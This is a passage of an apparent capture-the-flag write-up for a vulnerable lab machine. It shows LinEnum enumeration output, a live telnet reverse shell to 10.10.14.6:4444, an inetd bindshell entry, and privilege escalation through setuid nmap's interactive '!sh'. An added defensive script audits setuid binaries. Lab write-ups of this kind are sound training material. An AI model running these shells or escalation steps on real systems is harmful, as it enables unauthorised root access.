root      5033  0.0  0.1   2424   864 ?        Ss   06:52   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
daemon    5078  0.0  0.1   2316   560 ?        SN   06:52   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    5079  0.0  0.0   2316   216 ?        SN   06:52   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
proftpd   5081  0.0  0.3   9948  1596 ?        Ss   06:53   0:00 proftpd: (accepting connections)
daemon    5097  0.0  0.0   1984   420 ?        Ss   06:53   0:00 /usr/sbin/atd
root      5110  0.0  0.1   2104   900 ?        Ss   06:53   0:00 /usr/sbin/cron
root      5140  0.0  0.0   2052   352 ?        Ss   06:53   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      5141  0.0  0.0   2052   480 ?        S    06:53   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55  5143  1.4 17.3 363988 89308 ?        Sl   06:53   0:14 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      5163  0.0  0.4  10596  2556 ?        Ss   06:53   0:00 /usr/sbin/apache2 -k start
www-data  5164  0.0  0.3  10596  1948 ?        S    06:53   0:00 /usr/sbin/apache2 -k start
www-data  5166  0.0  0.3  10596  1948 ?        S    06:53   0:00 /usr/sbin/apache2 -k start
www-data  5168  0.0  0.3  10596  1948 ?        S    06:53   0:00 /usr/sbin/apache2 -k start
www-data  5171  0.0  0.3  10596  1948 ?        S    06:53   0:00 /usr/sbin/apache2 -k start
www-data  5173  0.0  0.3  10596  1948 ?        S    06:53   0:00 /usr/sbin/apache2 -k start
root      5184  0.0  5.1  66344 26480 ?        Sl   06:53   0:00 /usr/bin/rmiregistry
root      5188  0.0  0.4  12208  2536 ?        Sl   06:53   0:00 ruby /usr/sbin/druby_timeserver.rb
root      5194  0.0  0.4   8540  2368 ?        S    06:53   0:00 /usr/bin/unrealircd
root      5204  0.0  0.0   1716   488 tty1     Ss+  06:53   0:00 /sbin/getty 38400 tty1
root      5207  0.0  2.3  13924 12012 ?        S    06:53   0:00 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      5211  0.0  0.2   2724  1192 ?        S    06:53   0:00 /bin/sh /root/.vnc/xstartup
root      5214  0.0  0.4   5936  2576 ?        S    06:53   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      5217  0.0  0.9   8988  4988 ?        S    06:53   0:00 fluxbox
root      5228  0.0  0.2   2852  1544 pts/0    Ss+  06:53   0:00 -bash
daemon    5475  0.0  0.1   1848   532 ?        SN   07:02   0:00 sleep 3980
daemon    5476  0.0  0.1   3164  1024 ?        SN   07:02   0:00 telnet 10.10.14.6 4444
daemon    5477  0.0  0.1   3240   844 ?        SN   07:02   0:00 sh -c (sleep 3980|telnet 10.10.14.6 4444|while : ; do sh && break; done 2>&1|telnet 10.10.14.6 4444 >/dev/null 2>&1 &)
daemon    5478  0.0  0.2   3236  1448 ?        SN   07:02   0:00 sh
daemon    5479  0.0  0.2   3164  1048 ?        SN   07:02   0:00 telnet 10.10.14.6 4444
daemon    5489  0.0  0.4   3960  2472 ?        SN   07:04   0:00 python -c import pty; pty.spawn("/bin/sh")
daemon    5490  0.0  0.3   3372  1796 pts/1    SNs  07:04   0:00 /bin/sh
daemon    5541  0.0  0.3   3680  1920 pts/1    SN+  07:09   0:00 sh lin.sh
daemon    5542  0.0  0.2   3720  1456 pts/1    RN+  07:09   0:00 sh lin.sh
daemon    5544  0.0  0.0   1712   440 pts/1    SN+  07:09   0:00 tee -a
daemon    5773  0.0  0.2   3720  1312 pts/1    RN+  07:09   0:00 sh lin.sh
daemon    5774  0.0  0.1   2364   932 pts/1    RN+  07:09   0:00 ps aux

[-] Process binaries and associated permissions (from above list):
 48K -rwxr-xr-x 1 root root  48K Apr  4  2008 /bin/dd
   0 lrwxrwxrwx 1 root root    4 Apr 28  2010 /bin/sh -> bash
 16K -rwxr-xr-x 1 root root  15K Apr 14  2008 /sbin/getty
 92K -rwxr-xr-x 1 root root  88K Apr 11  2008 /sbin/init
 24K -rwxr-xr-x 1 root root  23K Nov 23  2007 /sbin/klogd
 16K -rwxr-xr-x 1 root root  15K Dec  3  2007 /sbin/portmap
 40K -rwxr-xr-x 1 root root  39K Dec  2  2008 /sbin/rpc.statd
 32K -rwxr-xr-x 1 root root  32K Nov 23  2007 /sbin/syslogd
 72K -rwxr-xr-x 1 root root  67K Apr 11  2008 /sbin/udevd
 32K -rwxr-xr-x 1 root root  31K May 21  2007 /usr/bin/jsvc
   0 lrwxrwxrwx 1 root root   29 Apr 28  2010 /usr/bin/rmiregistry -> 
/etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20  2012 /usr/bin/unrealircd
 28K -rwxr-xr-x 1 root root  28K Apr 18  2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21  2008 
/usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar  9  2010 /usr/sbin/apache2
 16K -rwxr-xr-x 1 root root  16K Feb 20  2007 /usr/sbin/atd
 32K -rwxr-xr-x 1 root root  31K Apr  8  2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28  2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr  9  2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28  2010 /usr/sbin/nmbd
 36K -rwxr-xr-x 1 root root  35K Dec  2  2008 /usr/sbin/rpc.idmapd
 76K -rwxr-xr-x 1 root root  72K Dec  2  2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28  2010 /usr/sbin/smbd
 24K -rwxr-xr-x 1 root root  24K Sep 24  2009 /usr/sbin/snmpd
368K -rwxr-xr-x 1 root root 363K Apr  6  2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec  3  2007 /usr/sbin/xinetd

[-] Contents of /etc/inetd.conf:
## netbios-ssn	stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/smbd
telnet		stream	tcp	nowait	telnetd	/usr/sbin/tcpd	
/usr/sbin/in.telnetd
## ftp		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.ftpd
tftp		dgram	udp	wait	nobody	/usr/sbin/tcpd	
/usr/sbin/in.tftpd /srv/tftp
shell		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.rshd
login		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.rlogind
exec		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.rexecd
ingreslock stream tcp nowait root /bin/bash bash -i

[-] The related inetd binary permissions:
-rwxr-xr-x 1 root root  8216 Nov 22  2007 /usr/sbin/in.rexecd
-rwxr-xr-x 1 root root 15620 Nov 22  2007 /usr/sbin/in.rlogind
-rwxr-xr-x 1 root root 14684 Nov 22  2007 /usr/sbin/in.rshd
-rwxr-xr-x 1 root root 36504 Dec 17  2006 /usr/sbin/in.telnetd
-rwxr-xr-x 1 root root 11596 Dec 17  2006 /usr/sbin/in.tftpd
-rwxr-xr-x 1 root root  4504 Jul 30  2007 /usr/sbin/tcpd
-rwxr-xr-x 1 root root  4504 Jul 30  2007 /usr/sbin/tcpd

[-] Contents of /etc/xinetd.conf:
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{

# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

}

includedir /etc/xinetd.d

[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary 
permissions are listed below:
total 32
drwxr-xr-x  2 root root 4096 May 20  2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  798 Dec  3  2007 chargen
-rw-r--r--  1 root root  660 Dec  3  2007 daytime
-rw-r--r--  1 root root  549 Dec  3  2007 discard
-rw-r--r--  1 root root  580 Dec  3  2007 echo
-rw-r--r--  1 root root  727 Dec  3  2007 time
-rw-r--r--  1 root root  576 May 20  2012 vsftpd

[-] /etc/init.d/ binary permissions:
total 376
drwxr-xr-x  2 root root  4096 May 20  2012 .
drwxr-xr-x 95 root root  4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  1335 Apr 19  2008 README
-rwxr-xr-x  1 root root  5736 Feb  1  2008 apache2
-rwxr-xr-x  1 root root  2653 Apr  7  2008 apparmor
-rwxr-xr-x  1 root root   969 Feb 20  2007 atd
-rwxr-xr-x  1 root root  2426 Apr  9  2008 bind9
-rwxr-xr-x  1 root root  3597 Apr 19  2008 bootclean
-rwxr-xr-x  1 root root  2121 Apr 19  2008 bootlogd
-rwxr-xr-x  1 root root  1768 Apr 19  2008 bootmisc.sh
-rwxr-xr-x  1 root root  3454 Apr 19  2008 checkfs.sh
-rwxr-xr-x  1 root root 10602 Apr 19  2008 checkroot.sh
-rwxr-xr-x  1 root root  6355 May 30  2007 console-screen.sh
-rwxr-xr-x  1 root root  1634 Jan 28  2008 console-setup
-rwxr-xr-x  1 root root  1761 Apr  8  2008 cron
-rwxr-xr-x  1 root root   429 May 14  2012 distcc
-rwxr-xr-x  1 root root  1223 Jun 22  2007 dns-clean
-rwxr-xr-x  1 root root  7195 Apr  4  2008 glibc.sh
-rwxr-xr-x  1 root root  1228 Apr 19  2008 halt
-rwxr-xr-x  1 root root   909 Apr 19  2008 hostname.sh
-rwxr-xr-x  1 root root  4521 Apr 14  2008 hwclock.sh
-rwxr-xr-x  1 root root  4528 Apr 14  2008 hwclockfirst.sh
-rwxr-xr-x  1 root root  1376 Jan 28  2008 keyboard-setup
-rwxr-xr-x  1 root root   944 Apr 19  2008 killprocs
-rwxr-xr-x  1 root root  1729 Nov 23  2007 klogd
-rwxr-xr-x  1 root root   748 Jan 23  2006 loopback
-rwxr-xr-x  1 root root  1399 Feb 25  2008 module-init-tools
-rwxr-xr-x  1 root root   596 Apr 19  2008 mountall-bootclean.sh
-rwxr-xr-x  1 root root  2430 Apr 19  2008 mountall.sh
-rwxr-xr-x  1 root root  1465 Apr 19  2008 mountdevsubfs.sh
-rwxr-xr-x  1 root root  1544 Apr 19  2008 mountkernfs.sh
-rwxr-xr-x  1 root root   594 Apr 19  2008 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root  1244 Apr 19  2008 mountoverflowtmp
-rwxr-xr-x  1 root root  3123 Apr 19  2008 mtab.sh
-rwxr-xr-x  1 root root  5755 Mar 27  2008 mysql
-rwxr-xr-x  1 root root  2515 Mar 27  2008 mysql-ndb
-rwxr-xr-x  1 root root  1905 Mar 27  2008 mysql-ndb-mgm
-rwxr-xr-x  1 root root  1772 Dec  3  2007 networking
-rwxr-xr-x  1 root root  5942 Dec  2  2008 nfs-common
-rwxr-xr-x  1 root root  4411 Dec  2  2008 nfs-kernel-server
-rwxr-xr-x  1 root root  2324 Apr 27  2007 openbsd-inetd
-rwxr-xr-x  1 root root  2377 Oct 23  2007 pcmciautils
-rwxr-xr-x  1 root root  1872 Dec  3  2007 portmap
-rwxr-xr-x  1 root root  4202 Apr 18  2008 postfix
-rwxr-xr-x  1 root root  1170 Mar 21  2008 postgresql-8.3
-rwxr-xr-x  1 root root   375 Oct  4  2007 pppd-dns
-rwxr-xr-x  1 root root  1261 Mar 13  2008 procps
-rwxr-xr-x  1 root root  4848 Feb 20  2008 proftpd
-rwxr-xr-x  1 root root  7891 Apr 19  2008 rc
-rwxr-xr-x  1 root root   522 Apr 19  2008 rc.local
-rwxr-xr-x  1 root root   117 Apr 19  2008 rcS
-rwxr-xr-x  1 root root   692 Apr 19  2008 reboot
-rwxr-xr-x  1 root root  1000 Apr 19  2008 rmnologin
-rwxr-xr-x  1 root root  4945 Apr 10  2008 rsync
-rwxr-xr-x  1 root root  1763 May 25  2004 samba
-rwxr-xr-x  1 root root   955 Oct 23  2007 screen-cleanup
-rwxr-xr-x  1 root root  1199 Apr 19  2008 sendsigs
-rwxr-xr-x  1 root root   585 Apr 19  2008 single
-rwxr-xr-x  1 root root  4215 Apr 19  2008 skeleton
-rwxr-xr-x  1 root root  2747 Sep 24  2009 snmpd
-rwxr-xr-x  1 root root  3839 Apr  6  2008 ssh
-rwxr-xr-x  1 root root   510 Apr 19  2008 stop-bootlogd
-rwxr-xr-x  1 root root   647 Apr 19  2008 stop-bootlogd-single
-rwxr-xr-x  1 root root  3343 Nov 23  2007 sysklogd
-rwxr-xr-x  1 root root  6860 Dec  7  2008 tomcat5.5
-rwxr-xr-x  1 root root  2488 Apr 11  2008 udev
-rwxr-xr-x  1 root root   706 Apr 11  2008 udev-finish
-rwxr-xr-x  1 root root  6358 Apr  7  2008 ufw
-rwxr-xr-x  1 root root  4030 Apr 19  2008 umountfs
-rwxr-xr-x  1 root root  1833 Apr 19  2008 umountnfs.sh
-rwxr-xr-x  1 root root  1863 Apr 19  2008 umountroot
-rwxr-xr-x  1 root root  1815 Apr 19  2008 urandom
-rwxr-xr-x  1 root root  2445 Apr 19  2008 waitnfs.sh
-rwxr-xr-x  1 root root  1626 Mar 12  2008 wpa-ifupdown
-rwxr-xr-x  1 root root  1843 May 13  2008 x11-common
-rwxr-xr-x  1 root root  1896 Dec  3  2007 xinetd
-rwxr-xr-x  1 root root   568 Mar 30  2008 xserver-xorg-input-wacom

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.9p10

[-] MYSQL version:
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

[+] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version		5.0.51a-3ubuntu5
Protocol version	10
Connection		Localhost via UNIX socket
UNIX socket		/var/run/mysqld/mysqld.sock
Uptime:			16 min 54 sec

Threads: 1  Questions: 438  Slow queries: 0  Opens: 419  Flush tables: 1  Open 
tables: 64  Queries per second avg: 0.432

[-] Postgres version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

[-] Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built:   Mar  9 2010 20:45:36

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii  distcc                                2.18.3-4.1ubuntu1                     
  Simple distributed compiler client and serve
ii  g++                                   4:4.2.3-1ubuntu6                      
  The GNU C++ compiler
ii  g++-4.2                               4.2.4-1ubuntu4                        
  The GNU C++ compiler
ii  gcc                                   4:4.2.3-1ubuntu6                      
  The GNU C compiler
ii  gcc-4.2                               4.2.4-1ubuntu4                        
  The GNU C compiler
ii  gcj-4.2                               4.2.4-1ubuntu3                        
  The GNU compiler for Java(TM)
ii  libecj-java                           3.3.0+0728-5                          
  Eclipse Java compiler (library)
ii  libecj-java-gcj                       3.3.0+0728-5                          
  Eclipse Java compiler (native library)

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1549 Mar 14  2017 /etc/passwd
-rw-r--r-- 1 root root 784 Mar 14  2017 /etc/group
-rw-r--r-- 1 root root 497 May 13  2012 /etc/profile
-rw-r----- 1 root shadow 1171 Mar 14  2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr

[-] SGID files:
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop

[+] Hosts.equiv file and contents: 
-rw-r--r-- 1 root root 121 May 20  2012 /etc/hosts.equiv
# /etc/hosts.equiv: list  of  hosts  and  users  that are granted "trusted" r
#		    command access to your system .
+ +


[-] NFS config details: 
-rw-r--r-- 1 root root 367 May 13  2012 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync) hostname2(ro,sync)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt)
# /srv/nfs4/homes  gss/krb5i(rw,sync)
#

/	*(rw,sync,no_root_squash,no_subtree_check)


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr  9  2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov  6  2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26  2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13  2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr  4  2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20  2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16  2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11  2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20  2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16  2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20  2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16  2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 19  2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar  5  2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20  2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20  2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar  8  2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 43 Mar 14  2017 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18  2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28  2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16  2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27  2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28  2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23  2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec  2  2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23  2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16  2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May  4  2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20  2012 /etc/xinetd.conf

[+] Root's history files are accessible!
lrwxrwxrwx 1 root root 9 May 14  2012 /root/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/makis/.bash_history
/home/user/.bash_history

[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x  2 root mail 4096 Mar 14  2017 .
drwxr-xr-x 15 root root 4096 May 20  2012 ..
-rw-------  1 root mail 1438 Mar 14  2017 root

### SCAN COMPLETE ####################################
In the SUID files section we see that nmap has the setuid bit set.

-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
Because nmap runs as root, we can launch a privileged shell from it[1], and that is how we perform the privilege escalation.

sh-3.2$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
sh-3.2# whoami
root
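The finding above, seen from the defender's side. This is an added example, not code from the original writeup or from LinEnum: a small POSIX shell audit that lists the setuid binaries under a directory, reports the ones that are not in a baseline allowlist (such as a setuid nmap), and drops the setuid bit from the offender. The function names (audit_suid, remediate_suid, make_demo_tree), the baseline list and the fake filesystem tree are all constructed for this example; on a real host you would run audit_suid against / with a baseline built from the package manager or a golden image.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit the setuid binaries on a
# host against a baseline and flag the unexpected ones, the same finding the
# LinEnum output above surfaced for /usr/bin/nmap.
# The baseline list, the function names and the demo tree are constructed.

# Baseline of setuid binaries expected on the host (constructed, deliberately
# short; on a real host build it from the package manager or a golden image).
SUID_BASELINE="/bin/su /bin/mount /bin/umount /usr/bin/passwd /usr/bin/sudo"

# audit_suid ROOT
# Print, one per line, every setuid file under ROOT whose path (relative to
# ROOT) is not in SUID_BASELINE. Prints nothing when everything is expected.
# A production audit would also restrict to '-user root' and compare hashes;
# that is omitted so the demo can run as an unprivileged user.
audit_suid() {
    root="${1%/}"                      # "/" becomes "", so paths stay absolute
    find "${root:-/}" -type f -perm -4000 2>/dev/null | while read -r f; do
        rel="${f#"$root"}"
        case " $SUID_BASELINE " in
            *" $rel "*) ;;             # expected setuid binary, keep quiet
            *) printf '%s\n' "$rel" ;; # unexpected: report it
        esac
    done
}

# remediate_suid ROOT PATH
# Drop the setuid bit from ROOT/PATH and return 0 only if it is really gone.
# This is the fix for a binary such as nmap that has no business being setuid.
remediate_suid() {
    target="${1%/}$2"
    chmod u-s "$target" && [ ! -u "$target" ]
}

# make_demo_tree
# Build a constructed fake filesystem under a temporary directory: two expected
# setuid binaries, one unexpected (nmap, mirroring the Lame finding) and one
# ordinary binary. Prints the directory so callers can audit and clean it up.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bin" "$d/usr/bin"
    : > "$d/bin/su";         chmod 4755 "$d/bin/su"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"
    : > "$d/usr/bin/nmap";   chmod 4755 "$d/usr/bin/nmap"   # the Lame finding
    : > "$d/usr/bin/curl";   chmod 0755 "$d/usr/bin/curl"   # not setuid
    printf '%s\n' "$d"
}

# Demo run: audit the constructed tree, fix the finding, audit again.
demo=$(make_demo_tree)
echo "Unexpected setuid binaries before remediation:"
audit_suid "$demo"
remediate_suid "$demo" /usr/bin/nmap
echo "Unexpected setuid binaries after remediation:"
audit_suid "$demo"
rm -rf "$demo"
```

On the demo tree the first audit reports only /usr/bin/nmap; after remediate_suid the second audit prints nothing, while the baseline binaries keep their setuid bit. Running the same audit periodically (or from a file integrity monitor) is what would have caught the setuid nmap on Lame before an attacker did.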

root.txt


All that is left is to grab the root flag.

sh-3.2# cd /root
sh-3.2# ls
Desktop  reset_logs.sh	root.txt  vnc.log
sh-3.2# cat root.txt
92caac3be140ef409e45721348a4eXXX

End


And with that we have both the "user" flag and the "root" flag.

[1] https://pentestlab.blog/category/privilege-escalation/